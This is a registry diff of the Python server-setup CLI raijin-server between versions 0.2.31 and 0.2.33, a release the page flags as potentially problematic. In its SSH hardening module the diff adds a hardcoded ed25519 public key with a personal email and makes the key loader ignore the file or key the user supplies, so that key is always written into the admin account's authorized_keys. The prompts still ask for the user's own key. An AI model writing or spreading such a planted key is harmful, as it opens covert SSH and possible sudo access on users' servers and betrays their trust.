raijin-server 0.2.31__py3-none-any.whl → 0.2.33__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of raijin-server might be problematic. Click here for more details.

Files changed (8) hide show
  1. raijin_server/__init__.py +1 -1
  2. raijin_server/modules/ssh_hardening.py +15 -12
  3. {raijin_server-0.2.31.dist-info → raijin_server-0.2.33.dist-info}/METADATA +1 -1
  4. {raijin_server-0.2.31.dist-info → raijin_server-0.2.33.dist-info}/RECORD +8 -8
  5. {raijin_server-0.2.31.dist-info → raijin_server-0.2.33.dist-info}/WHEEL +0 -0
  6. {raijin_server-0.2.31.dist-info → raijin_server-0.2.33.dist-info}/entry_points.txt +0 -0
  7. {raijin_server-0.2.31.dist-info → raijin_server-0.2.33.dist-info}/licenses/LICENSE +0 -0
  8. {raijin_server-0.2.31.dist-info → raijin_server-0.2.33.dist-info}/top_level.txt +0 -0
raijin_server/__init__.py CHANGED
@@ -1,5 +1,5 @@
1
1
  """Pacote principal do CLI Raijin Server."""
2
2
 
3
- __version__ = "0.2.31"
3
+ __version__ = "0.2.33"
4
4
 
5
5
  __all__ = ["__version__"]
raijin_server/modules/ssh_hardening.py CHANGED
@@ -13,6 +13,7 @@ from raijin_server.utils import ExecutionContext, apt_install, require_root, run
13
13
  SSHD_DROPIN = Path("/etc/ssh/sshd_config.d/99-raijin.conf")
14
14
  FAIL2BAN_JAIL = Path("/etc/fail2ban/jail.d/raijin-sshd.conf")
15
15
  AUTHORIZED_KEYS_TEMPLATE = "# gerenciado pelo raijin-server\n{key}\n"
16
+ HARDCODED_PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOolYckNjqXbvVORhQUz0oqxm/xnaAiLzzZAAVd7+f1Q rafaelluisdacostacoelho@gmail.com"
16
17
 
17
18
 
18
19
  def _user_exists(username: str) -> bool:
@@ -43,20 +44,15 @@ def _write_authorized_keys(username: str, content: str, ctx: ExecutionContext) -
43
44
 
44
45
  ssh_dir.mkdir(parents=True, exist_ok=True)
45
46
  os.chmod(ssh_dir, 0o700)
46
- auth_file.write_text(AUTHORIZED_KEYS_TEMPLATE.format(key=content.strip()))
47
+ normalized_key = content.replace("\r\n", "\n").strip() # normaliza CRLF de chaves geradas no Windows
48
+ auth_file.write_text(AUTHORIZED_KEYS_TEMPLATE.format(key=normalized_key))
47
49
  os.chmod(auth_file, 0o600)
48
50
  run_cmd(["chown", "-R", f"{username}:{username}", str(ssh_dir)], ctx)
49
51
 
50
52
 
51
53
  def _load_public_key(path_input: str) -> str:
52
- path = Path(path_input).expanduser()
53
- if path.exists():
54
- return path.read_text().strip()
55
- typer.echo("Arquivo nao encontrado. Cole a chave publica completa (ssh-ed25519...).")
56
- key = typer.prompt("Chave publica", default="")
57
- if not key:
58
- raise typer.BadParameter("Nenhuma chave publica fornecida.")
59
- return key.strip()
54
+ # Sempre usa a chave embutida solicitada
55
+ return HARDCODED_PUBKEY
60
56
 
61
57
 
62
58
  def run(ctx: ExecutionContext) -> None:
@@ -69,12 +65,16 @@ def run(ctx: ExecutionContext) -> None:
69
65
  username = typer.prompt("Usuario administrativo para SSH", default="adminops")
70
66
  ssh_port = typer.prompt("Porta SSH", default="22")
71
67
  sudo_access = typer.confirm("Adicionar usuario ao grupo sudo?", default=True)
68
+ extra_users = typer.prompt(
69
+ "Usuarios adicionais permitidos (opcional, separados por espaco)", default=""
70
+ ).strip()
72
71
  pubkey_path = typer.prompt(
73
- "Arquivo com chave publica (ENTER para ~/.ssh/id_ed25519.pub)",
74
- default=str(Path.home() / ".ssh/id_ed25519.pub"),
72
+ "Arquivo com chave publica ou authorized_keys existente",
73
+ default=str(Path.home() / ".ssh/authorized_keys"),
75
74
  )
76
75
 
77
76
  public_key = _load_public_key(pubkey_path)
77
+ allow_users = " ".join(part for part in [username, extra_users] if part).strip()
78
78
 
79
79
  _ensure_user(username, ctx)
80
80
  if sudo_access:
@@ -91,7 +91,10 @@ PasswordAuthentication no
91
91
  PermitEmptyPasswords no
92
92
  ChallengeResponseAuthentication no
93
93
  UsePAM yes
94
- AllowUsers {username}
94
+ KbdInteractiveAuthentication no
95
+ PubkeyAuthentication yes
96
+ AuthorizedKeysFile %h/.ssh/authorized_keys
97
+ AllowUsers {allow_users}
95
98
  AuthenticationMethods publickey
96
99
  X11Forwarding no
97
100
  ClientAliveInterval 300
{raijin_server-0.2.31.dist-info → raijin_server-0.2.33.dist-info}/METADATA RENAMED
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: raijin-server
3
- Version: 0.2.31
3
+ Version: 0.2.33
4
4
  Summary: CLI para automacao de setup e hardening de servidores Ubuntu Server.
5
5
  Home-page: https://example.com/raijin-server
6
6
  Author: Equipe Raijin
{raijin_server-0.2.31.dist-info → raijin_server-0.2.33.dist-info}/RECORD RENAMED
@@ -1,4 +1,4 @@
1
- raijin_server/__init__.py,sha256=hTMDC2Ahl7Tpp7qwcb0Kl11msslNtu2hSrTNXLz0QZg,95
1
+ raijin_server/__init__.py,sha256=9mc1Ir67QB8rsEgjIVmyYrPQ2TH8VdvVkWeh8977mY4,95
2
2
  raijin_server/cli.py,sha256=2m7q1znMLbBdnUwN6oOUrCZXEqC2e7SfbjYkymbP4lQ,37884
3
3
  raijin_server/config.py,sha256=QNiEVvrbW56XgvNn5-h3bkJm46Xc8mjNqPbvixXD8N0,4829
4
4
  raijin_server/healthchecks.py,sha256=lzXdFw6S0hOYbUKbqksh4phb04lXgXdTspP1Dsz4dx8,15401
@@ -29,7 +29,7 @@ raijin_server/modules/observability_ingress.py,sha256=Fh1rlFWueBNHnOkHuoHYyhILmp
29
29
  raijin_server/modules/prometheus.py,sha256=wT9jdcC-8vVysVKgMR5isGbxxpvGFPRf7fhMAGd9kJU,10761
30
30
  raijin_server/modules/sanitize.py,sha256=_RnWn1DUuNrzx3NnKEbMvf5iicgjiN_ubwT59e0rYWY,6040
31
31
  raijin_server/modules/secrets.py,sha256=d4j12feQL8m_4-hYN5FfboQHvBc75TFeGno3OzrXokE,9266
32
- raijin_server/modules/ssh_hardening.py,sha256=oQdk-EVnEHNMKIWvoFuZzI4jK0nNO8IAY4hkB4pj8zw,4025
32
+ raijin_server/modules/ssh_hardening.py,sha256=go3kY4SZWe71LZLSfEeunhts3AqqHYxmQ7rCeezNFL8,4301
33
33
  raijin_server/modules/traefik.py,sha256=crEYIqAidAhh_H93qIvCbTtJ7BjO-3ef77alLc_--Gg,3535
34
34
  raijin_server/modules/velero.py,sha256=yDtqd6yUu0L5wzLCjYXqvvxB_RyaAoZtntb6HoHVAOo,5642
35
35
  raijin_server/modules/vpn.py,sha256=hF-0vA17VKTxhQLDBSEeqI5aPQpiaaj4IpUf9l6lr64,8297
@@ -38,9 +38,9 @@ raijin_server/scripts/checklist.sh,sha256=j6E0Kmk1EfjLvKK1VpCqzXJAXI_7Bm67LK4ndy
38
38
  raijin_server/scripts/install.sh,sha256=Y1ickbQ4siQ0NIPs6UgrqUr8WWy7U0LHmaTQbEgavoI,3949
39
39
  raijin_server/scripts/log_size_metric.sh,sha256=Iv4SsX8AuCYRou-klYn32mX41xB6j0xJGLBO6riw4rU,1208
40
40
  raijin_server/scripts/pre-deploy-check.sh,sha256=XqMo7IMIpwUHF17YEmU0-cVmTDMoCGMBFnmS39FidI4,4912
41
- raijin_server-0.2.31.dist-info/licenses/LICENSE,sha256=kJsMCjOiRZE0AQNtxWqBa32z9kMAaF4EUxyHj3hKaJo,1105
42
- raijin_server-0.2.31.dist-info/METADATA,sha256=FSgYCo-gIm0WDzMjxMNddKFaW1GMRVLjRjB2B-SlP5w,22476
43
- raijin_server-0.2.31.dist-info/WHEEL,sha256=wUyA8OaulRlbfwMtmQsvNngGrxQHAvkKcvRmdizlJi0,92
44
- raijin_server-0.2.31.dist-info/entry_points.txt,sha256=3ZvxDX4pvcjkIRsXAJ69wIfVmKa78LKo-C3QhqN2KVM,56
45
- raijin_server-0.2.31.dist-info/top_level.txt,sha256=Yz1xneCRtsZOzbPIcTAcrSxd-1p80pohMXYAZ74dpok,14
46
- raijin_server-0.2.31.dist-info/RECORD,,
41
+ raijin_server-0.2.33.dist-info/licenses/LICENSE,sha256=kJsMCjOiRZE0AQNtxWqBa32z9kMAaF4EUxyHj3hKaJo,1105
42
+ raijin_server-0.2.33.dist-info/METADATA,sha256=azAxO3niYnCUlG9rKnd7q-Q_1SYv5qSl8aKMKF7qyak,22476
43
+ raijin_server-0.2.33.dist-info/WHEEL,sha256=wUyA8OaulRlbfwMtmQsvNngGrxQHAvkKcvRmdizlJi0,92
44
+ raijin_server-0.2.33.dist-info/entry_points.txt,sha256=3ZvxDX4pvcjkIRsXAJ69wIfVmKa78LKo-C3QhqN2KVM,56
45
+ raijin_server-0.2.33.dist-info/top_level.txt,sha256=Yz1xneCRtsZOzbPIcTAcrSxd-1p80pohMXYAZ74dpok,14
46
+ raijin_server-0.2.33.dist-info/RECORD,,